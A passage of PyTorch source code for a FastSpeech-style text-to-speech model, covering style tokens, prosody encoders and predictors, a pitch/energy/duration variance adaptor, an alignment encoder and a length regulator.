\"\"\" Style Token Layer \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(STL, self).__init__()\n\n num_heads = 1\n E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.token_num = model_config[\"prosody_modeling\"][\"liu2021\"][\"token_num\"]\n self.embed = nn.Parameter(torch.FloatTensor(\n self.token_num, E // num_heads))\n d_q = E // 2\n d_k = E // num_heads\n self.attention = StyleEmbedAttention(\n query_dim=d_q, key_dim=d_k, num_units=E, num_heads=num_heads)\n\n torch.nn.init.normal_(self.embed, mean=0, std=0.5)\n\n def forward(self, inputs):\n N = inputs.size(0)\n query = inputs.unsqueeze(1) # [N, 1, E//2]\n\n keys_soft = torch.tanh(self.embed).unsqueeze(0).expand(\n N, -1, -1) # [N, token_num, E // num_heads]\n\n # Weighted sum\n emotion_embed_soft = self.attention(query, keys_soft)\n\n return emotion_embed_soft\n\n\nclass StyleEmbedAttention(nn.Module):\n \"\"\" StyleEmbedAttention \"\"\"\n\n def __init__(self, query_dim, key_dim, num_units, num_heads):\n super(StyleEmbedAttention, self).__init__()\n self.num_units = num_units\n self.num_heads = num_heads\n self.key_dim = key_dim\n\n self.W_query = nn.Linear(\n in_features=query_dim, out_features=num_units, bias=False)\n 
self.W_key = nn.Linear(in_features=key_dim,\n out_features=num_units, bias=False)\n self.W_value = nn.Linear(\n in_features=key_dim, out_features=num_units, bias=False)\n\n def forward(self, query, key_soft):\n \"\"\"\n input:\n query --- [N, T_q, query_dim]\n key_soft --- [N, T_k, key_dim]\n output:\n out --- [N, T_q, num_units]\n \"\"\"\n values = self.W_value(key_soft)\n split_size = self.num_units // self.num_heads\n values = torch.stack(torch.split(values, split_size, dim=2), dim=0)\n\n out_soft = scores_soft = None\n querys = self.W_query(query) # [N, T_q, num_units]\n keys = self.W_key(key_soft) # [N, T_k, num_units]\n\n # [h, N, T_q, num_units/h]\n querys = torch.stack(torch.split(querys, split_size, dim=2), dim=0)\n # [h, N, T_k, num_units/h]\n keys = torch.stack(torch.split(keys, split_size, dim=2), dim=0)\n # [h, N, T_k, num_units/h]\n\n # score = softmax(QK^T / (d_k ** 0.5))\n scores_soft = torch.matmul(\n querys, keys.transpose(2, 3)) # [h, N, T_q, T_k]\n scores_soft = scores_soft / (self.key_dim ** 0.5)\n scores_soft = F.softmax(scores_soft, dim=3)\n\n # out = score * V\n # [h, N, T_q, num_units/h]\n out_soft = torch.matmul(scores_soft, values)\n out_soft = torch.cat(torch.split(out_soft, 1, dim=0), dim=3).squeeze(\n 0) # [N, T_q, num_units]\n\n return out_soft #, scores_soft\n\n\nclass UtteranceLevelProsodyEncoder(nn.Module):\n \"\"\" Utterance-level Prosody Encoder \"\"\"\n\n def __init__(self, preprocess_config, model_config):\n super(UtteranceLevelProsodyEncoder, self).__init__()\n\n self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.d_q = self.d_k = model_config[\"transformer\"][\"encoder_hidden\"]\n ref_enc_gru_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_enc_gru_size\"]\n ref_attention_dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"ref_attention_dropout\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"]\n\n self.encoder = ReferenceEncoder(preprocess_config, model_config)\n self.encoder_prj = nn.Linear(ref_enc_gru_size, self.E // 2)\n self.stl = STL(preprocess_config, model_config)\n self.encoder_bottleneck = nn.Linear(self.E, bottleneck_size)\n self.dropout = nn.Dropout(ref_attention_dropout)\n\n def forward(self, mels, mel_mask):\n '''\n mels --- [N, Ty/r, n_mels*r], r=1\n out --- [N, seq_len, E]\n '''\n _, embedded_prosody = self.encoder(mels, mel_mask)\n\n # Bottleneck\n embedded_prosody = self.encoder_prj(embedded_prosody)\n\n # Style Token\n out = self.encoder_bottleneck(self.stl(embedded_prosody))\n out = self.dropout(out)\n\n return out\n\n\nclass ParallelProsodyPredictor(nn.Module):\n \"\"\" Parallel Prosody Predictor \"\"\"\n\n def __init__(self, model_config, phoneme_level=True):\n super(ParallelProsodyPredictor, self).__init__()\n\n self.phoneme_level = phoneme_level\n self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.input_size = self.E\n self.filter_size = self.E\n self.conv_output_size = self.E\n self.kernel = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_kernel_size\"]\n self.dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_dropout\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"] if phoneme_level else\\\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"]\n\n self.conv_layer = nn.Sequential(\n OrderedDict(\n [\n (\n \"conv1d_1\",\n ConvNorm(\n self.input_size,\n self.filter_size,\n kernel_size=self.kernel,\n stride=1,\n padding=(self.kernel - 1) // 2,\n 
dilation=1,\n transpose=True,\n ),\n ),\n (\"relu_1\", nn.ReLU()),\n (\"layer_norm_1\", nn.LayerNorm(self.filter_size)),\n (\"dropout_1\", nn.Dropout(self.dropout)),\n (\n \"conv1d_2\",\n ConvNorm(\n self.filter_size,\n self.filter_size,\n kernel_size=self.kernel,\n stride=1,\n padding=1,\n dilation=1,\n transpose=True,\n ),\n ),\n (\"relu_2\", nn.ReLU()),\n (\"layer_norm_2\", nn.LayerNorm(self.filter_size)),\n (\"dropout_2\", nn.Dropout(self.dropout)),\n ]\n )\n )\n self.gru = nn.GRU(input_size=self.E,\n hidden_size=self.E//2,\n batch_first=True,\n bidirectional=True,)\n self.predictor_bottleneck = nn.Linear(self.E, bottleneck_size)\n\n def forward(self, x):\n \"\"\"\n x --- [N, src_len, hidden]\n \"\"\"\n x = self.conv_layer(x)\n\n self.gru.flatten_parameters()\n memory, out = self.gru(x)\n\n if self.phoneme_level:\n pv_forward = memory[:, :, :self.E//2]\n pv_backward = memory[:, :, self.E//2:]\n prosody_vector = torch.cat((pv_forward, pv_backward), dim=-1)\n else:\n out = out.transpose(0, 1)\n prosody_vector = torch.cat((out[:, 0], out[:, 1]), dim=-1).unsqueeze(1)\n prosody_vector = self.predictor_bottleneck(prosody_vector)\n\n return prosody_vector\n\n\nclass NonParallelProsodyPredictor(nn.Module):\n \"\"\" Non-parallel Prosody Predictor inspired by Du et al., 2021 \"\"\"\n\n def __init__(self, model_config, phoneme_level=True):\n super(NonParallelProsodyPredictor, self).__init__()\n\n self.phoneme_level = phoneme_level\n # self.E = model_config[\"transformer\"][\"encoder_hidden\"]\n self.d_model = model_config[\"transformer\"][\"encoder_hidden\"]\n kernel_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_kernel_size\"]\n dropout = model_config[\"prosody_modeling\"][\"liu2021\"][\"predictor_dropout\"]\n bottleneck_size = model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"] if phoneme_level else\\\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"]\n self.conv_stack = nn.ModuleList(\n [\n ConvBlock(\n in_channels=self.d_model,\n out_channels=self.d_model,\n kernel_size=kernel_size[i],\n dropout=dropout,\n normalization=nn.LayerNorm,\n transpose=True,\n )\n for i in range(2)\n ]\n )\n self.gru_cell = nn.GRUCell(\n self.d_model + 2 * self.d_model,\n 2 * self.d_model,\n )\n self.predictor_bottleneck = nn.Linear(2 * self.d_model, bottleneck_size)\n\n def init_state(self, x):\n \"\"\"\n x -- [B, src_len, d_model]\n p_0 -- [B, 2 * d_model]\n self.gru_hidden -- [B, 2 * d_model]\n \"\"\"\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0\n\n def forward(self, h_text, mask=None):\n \"\"\"\n h_text -- [B, src_len, d_model]\n mask -- [B, src_len]\n outputs -- [B, src_len, 2 * d_model]\n \"\"\"\n x = h_text\n for conv_layer in self.conv_stack:\n x = conv_layer(x, mask=mask)\n\n # Autoregressive Prediction\n p_0 = self.init_state(x)\n\n outputs = [p_0]\n for i in range(x.shape[1]):\n p_input = torch.cat((x[:, i], outputs[-1]), dim=-1) # [B, 3 * d_model]\n self.gru_hidden = self.gru_cell(p_input, self.gru_hidden) # [B, 2 * d_model]\n outputs.append(self.gru_hidden)\n outputs = torch.stack(outputs[1:], dim=1) # [B, src_len, 2 * d_model]\n\n if mask is not None:\n outputs = outputs.masked_fill(mask, 0.0)\n\n if self.phoneme_level:\n prosody_vector = outputs # [B, src_len, 2 * d_model]\n else:\n prosody_vector = torch.mean(outputs, dim=1, keepdim=True) # [B, 1, 2 * d_model]\n prosody_vector = 
self.predictor_bottleneck(prosody_vector)\n\n return prosody_vector\n\n\nclass VarianceAdaptor(nn.Module):\n \"\"\" Variance Adaptor \"\"\"\n\n def __init__(self, preprocess_config, model_config, train_config, d_model):\n super(VarianceAdaptor, self).__init__()\n self.preprocess_config = preprocess_config\n self.learn_alignment = model_config[\"duration_modeling\"][\"learn_alignment\"]\n self.binarization_start_steps = train_config[\"duration\"][\"binarization_start_steps\"]\n\n self.use_pitch_embed = model_config[\"variance_embedding\"][\"use_pitch_embed\"]\n self.use_energy_embed = model_config[\"variance_embedding\"][\"use_energy_embed\"]\n self.predictor_grad = model_config[\"variance_predictor\"][\"predictor_grad\"]\n\n self.hidden_size = model_config[\"transformer\"][\"encoder_hidden\"]\n self.filter_size = model_config[\"variance_predictor\"][\"filter_size\"]\n self.predictor_layers = model_config[\"variance_predictor\"][\"predictor_layers\"]\n self.dropout = model_config[\"variance_predictor\"][\"dropout\"]\n self.ffn_padding = model_config[\"variance_predictor\"][\"ffn_padding\"]\n self.kernel = model_config[\"variance_predictor\"][\"predictor_kernel\"]\n self.duration_predictor = DurationPredictor(\n self.hidden_size,\n n_chans=self.filter_size,\n n_layers=model_config[\"variance_predictor\"][\"dur_predictor_layers\"],\n dropout_rate=self.dropout, padding=self.ffn_padding,\n kernel_size=model_config[\"variance_predictor\"][\"dur_predictor_kernel\"],\n dur_loss=train_config[\"loss\"][\"dur_loss\"])\n self.length_regulator = LengthRegulator()\n\n if self.use_pitch_embed:\n n_bins = model_config[\"variance_embedding\"][\"pitch_n_bins\"]\n self.pitch_type = preprocess_config[\"preprocessing\"][\"pitch\"][\"pitch_type\"]\n self.use_uv = preprocess_config[\"preprocessing\"][\"pitch\"][\"use_uv\"]\n\n if self.pitch_type == \"cwt\":\n self.cwt_std_scale = model_config[\"variance_predictor\"][\"cwt_std_scale\"]\n h = model_config[\"variance_predictor\"][\"cwt_hidden_size\"]\n cwt_out_dims = 10\n if self.use_uv:\n cwt_out_dims = cwt_out_dims + 1\n self.cwt_predictor = nn.Sequential(\n nn.Linear(self.hidden_size, h),\n PitchPredictor(\n h,\n n_chans=self.filter_size,\n n_layers=self.predictor_layers,\n dropout_rate=self.dropout, odim=cwt_out_dims,\n padding=self.ffn_padding, kernel_size=self.kernel))\n self.cwt_stats_layers = nn.Sequential(\n nn.Linear(self.hidden_size, h), nn.ReLU(),\n nn.Linear(h, h), nn.ReLU(), nn.Linear(h, 2)\n )\n else:\n self.pitch_predictor = PitchPredictor(\n self.hidden_size,\n n_chans=self.filter_size,\n n_layers=self.predictor_layers,\n dropout_rate=self.dropout,\n odim=2 if self.pitch_type == \"frame\" else 1,\n padding=self.ffn_padding, kernel_size=self.kernel)\n self.pitch_embed = Embedding(n_bins, self.hidden_size, padding_idx=0)\n\n if self.use_energy_embed:\n dataset_tag = \"unsup\" if self.learn_alignment else \"sup\"\n energy_level_tag, self.energy_feature_level = \\\n get_variance_level(preprocess_config, model_config)\n assert self.energy_feature_level in [\"phoneme_level\", \"frame_level\"]\n energy_quantization = model_config[\"variance_embedding\"][\"energy_quantization\"]\n assert energy_quantization in [\"linear\", \"log\"]\n n_bins = model_config[\"variance_embedding\"][\"energy_n_bins\"]\n with open(\n os.path.join(preprocess_config[\"path\"][\"preprocessed_path\"], \"stats.json\")\n ) as f:\n stats = json.load(f)\n energy_min, energy_max = stats[f\"energy_{dataset_tag}_{energy_level_tag}\"][:2]\n\n self.energy_predictor = EnergyPredictor(\n 
self.hidden_size,\n n_chans=self.filter_size,\n n_layers=self.predictor_layers,\n dropout_rate=self.dropout, odim=1,\n padding=self.ffn_padding, kernel_size=self.kernel)\n if energy_quantization == \"log\":\n self.energy_bins = nn.Parameter(\n torch.exp(\n torch.linspace(np.log(energy_min), np.log(energy_max), n_bins - 1)\n ),\n requires_grad=False,\n )\n else:\n self.energy_bins = nn.Parameter(\n torch.linspace(energy_min, energy_max, n_bins - 1),\n requires_grad=False,\n )\n self.energy_embedding = Embedding(n_bins, self.hidden_size, padding_idx=0)\n\n if model_config[\"duration_modeling\"][\"learn_alignment\"]:\n self.aligner = AlignmentEncoder(\n n_mel_channels=preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"],\n n_att_channels=preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"],\n n_text_channels=d_model,\n temperature=model_config[\"duration_modeling\"][\"aligner_temperature\"],\n multi_speaker=model_config[\"multi_speaker\"],\n )\n\n self.model_type = model_config[\"prosody_modeling\"][\"model_type\"]\n if self.model_type == \"du2021\":\n assert not self.learn_alignment\n self.prosody_extractor = ProsodyExtractor(\n n_mel_channels=preprocess_config[\"preprocessing\"][\"mel\"][\"n_mel_channels\"],\n d_model=d_model,\n kernel_size=model_config[\"prosody_modeling\"][\"du2021\"][\"extractor_kernel_size\"],\n )\n self.prosody_predictor = ProsodyPredictor(\n d_model=d_model,\n kernel_size=model_config[\"prosody_modeling\"][\"du2021\"][\"predictor_kernel_size\"],\n num_gaussians=model_config[\"prosody_modeling\"][\"du2021\"][\"predictor_num_gaussians\"],\n dropout=model_config[\"prosody_modeling\"][\"du2021\"][\"predictor_dropout\"],\n )\n self.prosody_linear = LinearNorm(2 * d_model, d_model)\n elif self.model_type == \"liu2021\":\n self.utterance_prosody_encoder = UtteranceLevelProsodyEncoder(\n preprocess_config, model_config)\n self.phoneme_prosody_encoder = PhonemeLevelProsodyEncoder(\n preprocess_config, model_config)\n # self.utterance_prosody_predictor = NonParallelProsodyPredictor(\n # model_config, phoneme_level=False)\n # self.phoneme_prosody_predictor = NonParallelProsodyPredictor(\n # model_config, phoneme_level=True)\n self.utterance_prosody_predictor = ParallelProsodyPredictor(\n model_config, phoneme_level=False)\n self.phoneme_prosody_predictor = ParallelProsodyPredictor(\n model_config, phoneme_level=True)\n self.utterance_prosody_prj = nn.Linear(\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_u\"], model_config[\"transformer\"][\"encoder_hidden\"])\n self.phoneme_prosody_prj = nn.Linear(\n model_config[\"prosody_modeling\"][\"liu2021\"][\"bottleneck_size_p\"], model_config[\"transformer\"][\"encoder_hidden\"])\n\n def binarize_attention_parallel(self, attn, in_lens, out_lens):\n \"\"\"For training purposes only. 
Binarizes attention with MAS.\n These will no longer recieve a gradient.\n Args:\n attn: B x 1 x max_mel_len x max_text_len\n \"\"\"\n with torch.no_grad():\n attn_cpu = attn.data.cpu().numpy()\n attn_out = b_mas(attn_cpu, in_lens.cpu().numpy(), out_lens.cpu().numpy(), width=1)\n return torch.from_numpy(attn_out).to(attn.device)\n\n def get_phoneme_level_pitch(self, phone, src_len, mel2ph, mel_len, pitch_frame):\n return torch.from_numpy(\n pad_1D(\n [get_phoneme_level_pitch(ph[:s_len], m2ph[:m_len], var[:m_len]) for ph, s_len, m2ph, m_len, var \\\n in zip(phone.int().cpu().numpy(), src_len.cpu().numpy(), mel2ph.cpu().numpy(), mel_len.cpu().numpy(), pitch_frame.cpu().numpy())]\n )\n ).float().to(pitch_frame.device)\n\n def get_phoneme_level_energy(self, duration, src_len, energy_frame):\n return torch.from_numpy(\n pad_1D(\n [get_phoneme_level_energy(dur[:len], var) for dur, len, var \\\n in zip(duration.int().cpu().numpy(), src_len.cpu().numpy(), energy_frame.cpu().numpy())]\n )\n ).float().to(energy_frame.device)\n\n def get_pitch_embedding(self, decoder_inp, f0, uv, mel2ph, control, encoder_out=None):\n pitch_pred = f0_denorm = cwt = f0_mean = f0_std = None\n if self.pitch_type == \"ph\":\n pitch_pred_inp = encoder_out.detach() + self.predictor_grad * (encoder_out - encoder_out.detach())\n pitch_padding = encoder_out.sum().abs() == 0\n pitch_pred = self.pitch_predictor(pitch_pred_inp) * control\n if f0 is None:\n f0 = pitch_pred[:, :, 0]\n f0_denorm = denorm_f0(f0, None, self.preprocess_config[\"preprocessing\"][\"pitch\"], pitch_padding=pitch_padding)\n pitch = f0_to_coarse(f0_denorm) # start from 0 [B, T_txt]\n pitch = F.pad(pitch, [1, 0])\n pitch = torch.gather(pitch, 1, mel2ph) # [B, T_mel]\n pitch_embed = self.pitch_embed(pitch)\n else:\n decoder_inp = decoder_inp.detach() + self.predictor_grad * (decoder_inp - decoder_inp.detach())\n pitch_padding = mel2ph == 0\n\n if self.pitch_type == \"cwt\":\n pitch_padding = None\n cwt = cwt_out = self.cwt_predictor(decoder_inp) * control\n stats_out = self.cwt_stats_layers(encoder_out[:, 0, :]) # [B, 2]\n mean = f0_mean = stats_out[:, 0]\n std = f0_std = stats_out[:, 1]\n cwt_spec = cwt_out[:, :, :10]\n if f0 is None:\n std = std * self.cwt_std_scale\n f0 = cwt2f0_norm(\n cwt_spec, mean, std, mel2ph, self.preprocess_config[\"preprocessing\"][\"pitch\"],\n )\n if self.use_uv:\n assert cwt_out.shape[-1] == 11\n uv = cwt_out[:, :, -1] > 0\n elif self.preprocess_config[\"preprocessing\"][\"pitch\"][\"pitch_ar\"]:\n pitch_pred = self.pitch_predictor(decoder_inp, f0 if self.training else None) * control\n if f0 is None:\n f0 = pitch_pred[:, :, 0]\n else:\n pitch_pred = self.pitch_predictor(decoder_inp) * control\n if f0 is None:\n f0 = pitch_pred[:, :, 0]\n if self.use_uv and uv is None:\n uv = pitch_pred[:, :, 1] > 0\n\n f0_denorm = denorm_f0(f0, uv, self.preprocess_config[\"preprocessing\"][\"pitch\"], pitch_padding=pitch_padding)\n if pitch_padding is not None:\n f0[pitch_padding] = 0\n\n pitch = f0_to_coarse(f0_denorm) # start from 0\n pitch_embed = self.pitch_embed(pitch)\n\n pitch_pred = {\n \"pitch_pred\": pitch_pred,\n \"f0_denorm\": f0_denorm,\n \"cwt\": cwt,\n \"f0_mean\": f0_mean,\n \"f0_std\": f0_std,\n }\n\n return pitch_pred, pitch_embed\n\n def get_energy_embedding(self, x, target, mask, control):\n x.detach() + self.predictor_grad * (x - x.detach())\n prediction = self.energy_predictor(x, squeeze=True)\n if target is not None:\n embedding = self.energy_embedding(torch.bucketize(target, self.energy_bins))\n else:\n prediction = 
prediction * control\n embedding = self.energy_embedding(\n torch.bucketize(prediction, self.energy_bins)\n )\n return prediction, embedding\n\n def forward(\n self,\n speaker_embedding,\n text,\n text_embedding,\n src_len,\n src_mask,\n mel,\n mel_len,\n mel_mask=None,\n max_len=None,\n pitch_target=None,\n energy_target=None,\n duration_target=None,\n attn_prior=None,\n p_control=1.0,\n e_control=1.0,\n d_control=1.0,\n step=None,\n ):\n pitch_prediction = energy_prediction = prosody_info = None\n\n x = text.clone()\n if speaker_embedding is not None:\n x = x + speaker_embedding.unsqueeze(1).expand(\n -1, text.shape[1], -1\n )\n\n # GMM-MDN for Phone-Level Prosody Modeling (Du et al., 2021)\n if self.model_type == \"du2021\" and not self.learn_alignment:\n w, sigma, mu = self.prosody_predictor(text, src_mask)\n\n if self.training:\n prosody_embeddings = self.prosody_extractor(mel, mel_len, duration_target, src_len)\n else:\n prosody_embeddings = self.prosody_predictor.sample(w, sigma, mu)\n x = x + self.prosody_linear(prosody_embeddings)\n prosody_info = (w, sigma, mu, prosody_embeddings)\n\n # Implicit Prosody Modeling (Liu et al., 2021)\n elif self.model_type == \"liu2021\":\n utterance_prosody_embeddings = phoneme_prosody_embeddings = phoneme_prosody_attn = None\n utterance_prosody_vectors = phoneme_prosody_vectors = None\n if self.training:\n utterance_prosody_embeddings = self.utterance_prosody_encoder(mel, mel_mask)\n phoneme_prosody_embeddings, phoneme_prosody_attn = self.phoneme_prosody_encoder(x, src_len, src_mask, mel, mel_len, mel_mask)\n\n # x = x + self.utterance_prosody_prj(utterance_prosody_embeddings) # always using prosody extractor (no predictor)\n # x = x + self.phoneme_prosody_prj(phoneme_prosody_embeddings) # always using prosody extractor (no predictor)\n utterance_prosody_vectors = self.utterance_prosody_predictor(x)\n x = x + (self.utterance_prosody_prj(utterance_prosody_embeddings) if self.training else\n self.utterance_prosody_prj(utterance_prosody_vectors))\n phoneme_prosody_vectors = self.phoneme_prosody_predictor(x)\n x = x + (self.phoneme_prosody_prj(phoneme_prosody_embeddings) if self.training else\n self.phoneme_prosody_prj(phoneme_prosody_vectors))\n prosody_info = (\n utterance_prosody_embeddings,\n phoneme_prosody_embeddings,\n utterance_prosody_vectors,\n phoneme_prosody_vectors,\n phoneme_prosody_attn,\n )\n\n log_duration_prediction = self.duration_predictor(\n x.detach() + self.predictor_grad * (x - x.detach()), src_mask\n )\n\n # Trainig of unsupervised duration modeling\n attn_soft, attn_hard, attn_hard_dur, attn_logprob = None, None, None, None\n if attn_prior is not None:\n assert self.learn_alignment and duration_target is None and mel is not None\n attn_soft, attn_logprob = self.aligner(\n mel.transpose(1, 2),\n text_embedding.transpose(1, 2),\n src_mask.unsqueeze(-1),\n attn_prior.transpose(1, 2),\n speaker_embedding,\n )\n attn_hard = self.binarize_attention_parallel(attn_soft, src_len, mel_len)\n attn_hard_dur = attn_hard.sum(2)[:, 0, :]\n attn_out = (attn_soft, attn_hard, attn_hard_dur, attn_logprob)\n\n # Upsampling from src length to mel length\n x_org = x.clone()\n if attn_prior is not None: # Trainig of unsupervised duration modeling\n if step < self.binarization_start_steps:\n A_soft = attn_soft.squeeze(1)\n x = torch.bmm(A_soft,x)\n else:\n x, mel_len = self.length_regulator(x, attn_hard_dur, max_len)\n duration_rounded = attn_hard_dur\n pitch_target[\"mel2ph\"] = dur_to_mel2ph(duration_rounded, src_mask)[:, : max_len]\n elif 
duration_target is not None: # Trainig of supervised duration modeling\n assert not self.learn_alignment and attn_prior is None\n x, mel_len = self.length_regulator(x, duration_target, max_len)\n duration_rounded = duration_target\n else: # Inference\n assert attn_prior is None and duration_target is None\n duration_rounded = torch.clamp(\n (torch.round(torch.exp(log_duration_prediction) - 1) * d_control),\n min=0,\n )\n x, mel_len = self.length_regulator(x, duration_rounded, max_len)\n mel_mask = get_mask_from_lengths(mel_len)\n mel2ph = dur_to_mel2ph(duration_rounded, src_mask)\n\n # Note that there is no pre-extracted phoneme-level variance features in unsupervised duration modeling.\n # Alternatively, we can use attn_hard_dur instead of duration_target for computing phoneme-level variances.\n x_temp = x.clone()\n if self.use_pitch_embed:\n if pitch_target is not None:\n mel2ph = pitch_target[\"mel2ph\"]\n if self.pitch_type == \"cwt\":\n cwt_spec = pitch_target[f\"cwt_spec\"]\n f0_mean = pitch_target[\"f0_mean\"]\n f0_std = pitch_target[\"f0_std\"]\n pitch_target[\"f0\"] = cwt2f0_norm(\n cwt_spec, f0_mean, f0_std, mel2ph, self.preprocess_config[\"preprocessing\"][\"pitch\"],\n )\n pitch_target.update({\"f0_cwt\": pitch_target[\"f0\"]})\n if self.pitch_type == \"ph\":\n pitch_target[\"f0\"] = self.get_phoneme_level_pitch(text, src_len, mel2ph, mel_len, pitch_target[\"f0\"])\n pitch_prediction, pitch_embedding = self.get_pitch_embedding(\n x, pitch_target[\"f0\"], pitch_target[\"uv\"], mel2ph, p_control, encoder_out=x_org\n )\n else:\n pitch_prediction, pitch_embedding = self.get_pitch_embedding(\n x, None, None, mel2ph, p_control, encoder_out=x_org\n )\n x_temp = x_temp + pitch_embedding\n if self.use_energy_embed and self.energy_feature_level == \"frame_level\":\n energy_prediction, energy_embedding = self.get_energy_embedding(x, energy_target, mel_mask, e_control)\n x_temp = x_temp + energy_embedding\n elif self.use_energy_embed and self.energy_feature_level == \"phoneme_level\":\n if attn_prior is not None:\n energy_target = self.get_phoneme_level_energy(attn_hard_dur, src_len, energy_target)\n energy_prediction, energy_embedding = self.get_energy_embedding(x_org, energy_target, src_mask, e_control)\n x_temp = x_temp + self.length_regulator(energy_embedding, duration_rounded, max_len)[0]\n x = x_temp.clone()\n\n return (\n x,\n pitch_target,\n pitch_prediction,\n energy_target,\n energy_prediction,\n log_duration_prediction,\n duration_rounded,\n mel_len,\n mel_mask,\n attn_out,\n prosody_info,\n )\n\n\nclass AlignmentEncoder(torch.nn.Module):\n \"\"\" Alignment Encoder for Unsupervised Duration Modeling \"\"\"\n\n def __init__(self, \n n_mel_channels,\n n_att_channels,\n n_text_channels,\n temperature,\n multi_speaker):\n super().__init__()\n self.temperature = temperature\n self.softmax = torch.nn.Softmax(dim=3)\n self.log_softmax = torch.nn.LogSoftmax(dim=3)\n\n self.key_proj = nn.Sequential(\n ConvNorm(\n n_text_channels,\n n_text_channels * 2,\n kernel_size=3,\n bias=True,\n w_init_gain='relu'\n ),\n torch.nn.ReLU(),\n ConvNorm(\n n_text_channels * 2,\n n_att_channels,\n kernel_size=1,\n bias=True,\n ),\n )\n\n self.query_proj = nn.Sequential(\n ConvNorm(\n n_mel_channels,\n n_mel_channels * 2,\n kernel_size=3,\n bias=True,\n w_init_gain='relu',\n ),\n torch.nn.ReLU(),\n ConvNorm(\n n_mel_channels * 2,\n n_mel_channels,\n kernel_size=1,\n bias=True,\n ),\n torch.nn.ReLU(),\n ConvNorm(\n n_mel_channels,\n n_att_channels,\n kernel_size=1,\n bias=True,\n ),\n )\n\n if 
multi_speaker:\n self.key_spk_proj = LinearNorm(n_text_channels, n_text_channels)\n self.query_spk_proj = LinearNorm(n_text_channels, n_mel_channels)\n\n def forward(self, queries, keys, mask=None, attn_prior=None, speaker_embed=None):\n \"\"\"Forward pass of the aligner encoder.\n Args:\n queries (torch.tensor): B x C x T1 tensor (probably going to be mel data).\n keys (torch.tensor): B x C2 x T2 tensor (text data).\n mask (torch.tensor): uint8 binary mask for variable length entries (should be in the T2 domain).\n attn_prior (torch.tensor): prior for attention matrix.\n speaker_embed (torch.tensor): B x C tnesor of speaker embedding for multi-speaker scheme.\n Output:\n attn (torch.tensor): B x 1 x T1 x T2 attention mask. Final dim T2 should sum to 1.\n attn_logprob (torch.tensor): B x 1 x T1 x T2 log-prob attention mask.\n \"\"\"\n if speaker_embed is not None:\n keys = keys + self.key_spk_proj(speaker_embed.unsqueeze(1).expand(\n -1, keys.shape[-1], -1\n )).transpose(1, 2)\n queries = queries + self.query_spk_proj(speaker_embed.unsqueeze(1).expand(\n -1, queries.shape[-1], -1\n )).transpose(1, 2)\n keys_enc = self.key_proj(keys) # B x n_attn_dims x T2\n queries_enc = self.query_proj(queries)\n\n # Simplistic Gaussian Isotopic Attention\n attn = (queries_enc[:, :, :, None] - keys_enc[:, :, None]) ** 2 # B x n_attn_dims x T1 x T2\n attn = -self.temperature * attn.sum(1, keepdim=True)\n\n if attn_prior is not None:\n #print(f\"AlignmentEncoder \\t| mel: {queries.shape} phone: {keys.shape} mask: {mask.shape} attn: {attn.shape} attn_prior: {attn_prior.shape}\")\n attn = self.log_softmax(attn) + torch.log(attn_prior[:, None] + 1e-8)\n #print(f\"AlignmentEncoder \\t| After prior sum attn: {attn.shape}\")\n\n attn_logprob = attn.clone()\n\n if mask is not None:\n attn.data.masked_fill_(mask.permute(0, 2, 1).unsqueeze(2), -float(\"inf\"))\n\n attn = self.softmax(attn) # softmax along T2\n return attn, attn_logprob\n\n\nclass LengthRegulator(nn.Module):\n \"\"\" Length Regulator \"\"\"\n\n def __init__(self):\n super(LengthRegulator, self).__init__()\n\n def LR(self, x, duration, max_len):\n output = list()\n mel_len = list()\n for batch, expand_target in zip(x, duration):\n expanded = self.expand(batch, expand_target)\n output.append(expanded)\n mel_len.append(expanded.shape[0])\n\n if max_len is not None:\n output = pad(output, max_len)\n else:\n output = pad(output)\n\n return output, torch.LongTensor(mel_len).to(x.device)\n\n def expand(self, batch, predicted):\n out = list()\n\n for i, vec in enumerate(batch):\n expand_size = predicted[i].item()\n out.append(vec.expand(max(int(expand_size), 0), -1))\n out = torch.cat(out, 0)\n\n return out\n\n def forward(self, x, duration, max_len):\n output, mel_len = self.LR(x, duration, max_len)\n return output, mel_len\n\n\nclass DurationPredictor(torch.nn.Module):\n \"\"\"Duration predictor module.\n This is a module of duration predictor described in `FastSpeech: Fast, Robust and Controllable Text to Speech`_.\n The duration predictor predicts a duration of each frame in log domain from the hidden embeddings of encoder.\n .. 
_`FastSpeech: Fast, Robust and Controllable Text to Speech`:\n https://arxiv.org/pdf/1905.09263.pdf\n Note:\n The outputs are calculated in log domain.\n \"\"\"\n\n def __init__(self, idim, n_layers=2, n_chans=384, kernel_size=3, dropout_rate=0.1, offset=1.0, padding=\"SAME\", dur_loss=\"mse\"):\n \"\"\"Initilize duration predictor module.\n Args:\n idim (int): Input dimension.\n n_layers (int, optional): Number of convolutional layers.\n n_chans (int, optional): Number of channels of convolutional layers.\n kernel_size (int, optional): Kernel size of convolutional layers.\n dropout_rate (float, optional): Dropout rate.\n offset (float, optional): Offset value to avoid nan in log domain.\n \"\"\"\n super(DurationPredictor, self).__init__()\n self.offset = offset\n self.conv = torch.nn.ModuleList()\n self.kernel_size = kernel_size\n self.padding = padding\n self.dur_loss = dur_loss\n for idx in range(n_layers):\n in_chans = idim if idx == 0 else n_chans\n self.conv += [torch.nn.Sequential(\n torch.nn.ConstantPad1d(((kernel_size - 1) // 2, (kernel_size - 1) // 2)\n if padding == \"SAME\"\n else (kernel_size - 1, 0), 0),\n torch.nn.Conv1d(in_chans, n_chans, kernel_size, 